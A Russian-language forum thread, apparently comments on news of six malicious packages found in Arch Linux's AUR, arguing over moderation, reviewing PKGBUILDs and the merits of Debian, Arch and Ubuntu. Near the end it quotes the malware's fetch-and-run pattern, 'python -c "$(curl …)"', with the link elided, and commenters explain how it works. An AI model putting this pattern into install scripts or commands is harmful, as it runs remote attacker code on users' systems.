В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов

В почти бесконтрольной репе выявлены очередные 6 вредоносных пакетов.

Тащем-то это неизбежно будет происходить на любом ресурсе с пост-модерацией.

А что так кучно? 25 лет я о таком не слышал, а в последний год аж 3-4 новости сразу?

Нагнетают-с.

Репы с пост-модерацией не были массовыми. Через пре-модерацию такие откровенные закладки не проскочили бы.

Админы молодцы, конечно. Спасибо им. Ох неблагодарная у них работа.

А в премодерацию входила бы проверка каждого изменения и каждого стороннего файла загружаемого? Представляешь себе объём?

Представляешь себе объём?

вот и пришла расплата за неконтролируемую помойку «всегда свежего софта»

Не всегда свежего, а пакетов формируемых из произвольных данных сторонними людьми. В репах Арча пакеты от доверенных (более менее) людей. А в ауре их делает кто хочет. Некоторые пакеты даже собираются не из гитов оригинальных проектов, а из форклв,где хозяин волен поместить что угодно. Даже не надо левых скриптов в pkgbuild качать. Нет, не все шпионы, конечно, люди так делают из других соображений. Но в таком юардаке легко затеряться и начать гадить.

Не свежие пакеты виноваты, а те, кто искажает смысл существования aur. Будет жаль, когда его закроют.

А с оверлеями та же ситуация?

Ну так да, в этом суть. Поэтому репы с пост-модерацией такие большие и так быстро получают обновления.

Такое происходит даже на ресурсах с пре-модерацией.

Так браузеры и есть вредоносное ПО, я же правильно понимаю?

Есть ещё какой-то модный аналог AUR, недавно был упомянут в опросе. Не могу вспомнить.

Нет, это было про chaotic-aur.

Т.е. хром и шрифты к нему в зоне риска.

Ну так Рач же. В принципе, ничего удивительного. Хотя нет, удивительно, что так долго держались. Впрочем, ещё не факт, что держались, это ж только то, что нашли — а может ещё и не найденного там навалом.

Черным по белому написано «осматривайте PKGBUILD», «AUR никто не мониторит». Это всё равно, что жаловаться на вредонос в скачанном с рандомного гитхаб репозитория скрипте.

Черным по белому написано «осматривайте PKGBUILD», «AUR никто не мониторит».

Проще поставить дебиан и перестать заниматься фигней :) Ну или федору, например. Тут уж кому что больше нравится.

это еще snap и flatpak не трясли

Бич божий.

Да кого волнуют компы всяких красноглазиков… У взрослых людей системы на убунте.

Я на дебиан тоже могу скачать с гитхаба скрипт, и сказать, что у меня данные увели. Просто у кого-то есть глаза прочитать дисклеймер неофициального (!) пользовательского (!) репозитория, а у кого-то они отсутствуют.

Клоака. Ничего удивительного.

Это та, которая через.. снап... работает? С бубнами , чтобы поставить старый драйвер на нвидию на новое ядро? Это то, что разваливается после обновления? Это там, где не АУР, а ППА? Взрослые люди выбирали Убунту версии до 16-18-й максимум.

Вот ниразу не проще. Я конечно не на арче, но версии софта дебиана угнетают меня просто своим существованием. Этим же нельзя реально пользоваться. Федору еще можно глянуть, но там свои нюансы.

какой снап, какая нвидиа… Я говорю про взрослых людей, у которых сервера, энджинкс и ко.

Тогда к чему сравнение про арч и убунту сервер? Арч априори не про сервер, а про десктоп. Ты не отрицаешь нужность десктопа? Как десктоп арч лучше убунты, это факт. Я это имел ввиду.Й Ты уж извини, что я со своим рылом к серьезным дядькам с серверами залез неподумавши.

Маловато как-то. Плохо искали, видимо

Ты не отрицаешь нужность десктопа?

смотря какого десктопа. Если того, который используется для разработки для серьёзных дядь, зачастую удобнее иметь одинаковый дистр и на серваке, и на десктопе.

Проще поставить дебиан и перестать заниматься фигней

…потому что даже если очень захочется, то окажется, что фигня под дебиан или устаревшая, или не в репах, или не работает.

Проще:

Пользователь: rsload Пароль: rsload

Так всегда в репе что-то устаревает. Не обновляют дистр с каждой новой версией.

Я на дебиан тоже могу скачать с гитхаба скрипт, и сказать, что у меня данные увели. Просто у кого-то есть глаза прочитать дисклеймер неофициального (!) пользовательского (!) репозитория

Так с гитхаба, или с репозитария? ты уж определись как-бэ. Это я про дебиан, если что.

Арч априори не про сервер, а про десктоп.

Ась? Какой такой павлин-мавлин?

Ты не отрицаешь нужность десктопа?

Как до луны - одним местом. Любому линукс-дистрибутиву. Проще говоря в том виде, в котором он сейчас - он - даром не нужен и нормальным людям - не уперся. Причин - масса и не один раз они были озвучены.

Как десктоп арч лучше убунты, это факт.

Они оба-два - барахло.

Ты уж извини, что я со своим рылом к серьезным дядькам с серверами залез неподумавши.

Вот и подумай в следующий раз….

Очень не хватало экспертного мнения. Особенно твоего.

даром не нужен и нормальным людям - не уперся.

Ты то же, конечно, нормальный, не то, что эти, другие.

…потому что даже если очень захочется, то окажется, что фигня под дебиан или устаревшая, или не в репах, или не работает.

Банальные голословные утверждения.

Пользователь: rsload Пароль: rsload

Ты оттуда еще что-то качаешь ? О_О

Очень не хватало экспертного мнения. Особенно твоего.

Конечно. Ты обращайся. Не стесняйся. Первое обращение-бесплатно ! :)

Ты то же, конечно, нормальный, не то, что эти, другие.

Конечно. Ты разве не знал ? :)

«Байзэвэй, у вас вирусня» - теперь будет популярным слоганом.

Конечно. Ты обращайся. Не стесняйся. Первое обращение-бесплатно ! :)

Нет, спасибо. Ведь «Еврипида, колупающий в носу, мудрецу подобен». Обойдусь.

Нормально всё в дебиане, не выдумывай. Можно даже и oldoldstable использовать и всё будет норм. А на цифры просто не смотри.

Не ну я не знаю. Ну есть же винда, ну тиранте виндузятников… Ну что за свинство!?

мораль людская падает

Да я бы не смотрел, но попробуй поюзать модули питона те же в дебиане. Как то тут смотрели, там самое новое было из года этак 19-21, что уже несколько лет как устарело и не поддерживается. И так во многом.

А значит, надо ставить стороннее, а тогда смысл в этом всем? Это просто один пример.

Сейчас многое развивается гораздо быстрее, чем за всем этим поспевают релизныые дистрибутивы.

Будет жаль, когда его закроют.

Э-эээ…

Ставьте клоуна, если целенаправленно искали вирусы в aur

в котором среди прочего присутствовала команда ‘python -c "$(curl вредоносная ссылка)"’

и очень извиняюсь, но зойчем тут питон? напрямую из шелл-скрипта курл никак не запустить?
кстати, курл в зависимостях пакета есть? а то ведь его может и не быть в системе - вот это будет прикол!

Питон тут затем чтобы скачанное курлом запустить. Это не бинарник же а скрипт.

Чотам, какой версии кеды в стабильном демьяне?

Блин, а ловко. Надо запомнить.

Чотам, какой версии кеды в стабильном демьяне?

А мне - героически наплевать, «какие там кеды». Потому как на серверах они мне не нужны от слова совсем.